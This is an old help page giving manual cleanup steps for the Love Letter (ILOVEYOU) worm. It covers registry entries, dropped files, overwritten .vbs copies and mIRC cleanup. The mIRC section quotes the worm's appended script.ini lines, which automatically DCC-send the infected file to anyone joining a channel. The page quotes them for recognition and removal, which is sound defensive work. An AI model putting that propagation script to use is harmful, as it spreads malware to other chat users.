Le "KAK"

Removing Love Letter virus

Since most of the antivirus companies' web sites are severely crowded right now; here are some simple instructions for manually cleaning the virus' damage off the computer.

Cleaning the registry:
Delete the following Windows Registry entries by clicking on "Start", then "Run", then typing in "regedit" (no quotes). If regedit has been removed from your system by your system administrators, contact them:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\MSKernel32

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL

Search your machine by right-clicking "My Computer" and typing in the "find what" spot "winfat32.exe" (no quotes). If that file is there, then delete from the registry the following entry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\WIN-BUGSFIX

Change the value of the following registry key to your favorite web site
(http://www.forensics-intl.com, :)):

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Main\Start Page

Cleaning up the Love-Bug "droppings" it left on your drives:
Use the find technique listed above to find "LOVE-LETTER-FOR-YOU.HTM" and "LOVE-LETTER-FOR-YOU.TXT". These should be found on non-removable drives only. Delete these files no matter where you find them. Do NOT open them... just select all occurences in the resultant list by highlighting them and deleting them.

Cleaning up re-written files that are now merely copies of the virus: All files of the types listed below are now changed. They have been overwritten by copies of the virus; and must be deleted. Your original data can only be retrieved via data recovery methods. The author wrote this with the thought in mind that most Windows users hide file extensions (which is the default behavior of windows). The filename extension is now ".vbs"; which is run VB Scripting utility internal to Windows.

Furthermore, the Registry key association of a program to execute the filetypes has now been changed. Every time you double-click on one of the below-listed files, Explorer will run the virus all over again. This makes it inconvenient to eradicate after only a few minutes of normal use by the user.

File Types: css, jpg, jpeg js, jse, sct, hta, mp3, mp2, vbs, vbe, wsh

Find those file types by using the "Find" technique listed above and typing "*.(ext).vbs" (no quotes, and replace (ext) with the appropriate three-letter extension). Once you find them, delete them. You may want to keep a list of the files you deleted, so that later you know why the document or graphic, etc you had yesterday is now gone.

Once the antivirus companies release their updates (and their site traffic slows down); this will be done much more gracefully, because the virus can then be surgically extracted from within the execuable. For those who absolutely MUST keep a crucial file; use DiskEdit against the files which, by virtue of their filetype, you believe to be infected. You will see the virus has now appended itself to some of the files, totally overwritten the others. You can carve out the malignancy using Symantec's DiskEdit. Use caution.

System administrators, beware that if a user has a network drive mounted as a share on their system, the shared drive may have infected files as well.

Cleaning up mIRC:

If you have Mardam Bey's mIRC Internet Relay Chat client installed on your system(you can check this by using the find technique listed above and searching for "mirc.ini"), Then a script has been added to the mIRC subdirectory that will REDISTRIBUTE the virus the next time you go into an irc channel. The re-written script is called "script.ini". Check this file for the occurrence of the following lines:

[script]
mIRC Script
Please dont edit this script... mIRC will corrupt, if mIRC will corrupt...
WINDOWS will affect and will not run correctly. Thanks
Khaled Mardam-Bey
http://www.mirc.com
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
Those are the lines that are appended to any existing script.ini for mIRC by the worm. Khaled's english is better than mine... these lines were NOT written by him. Either delete those lines, or you can delete script.ini altogether if it was never customized by you before.

Reboot your Windows machine. Keeping the list of files that were overwritten will assist in debugging any problems which might occur thereafter.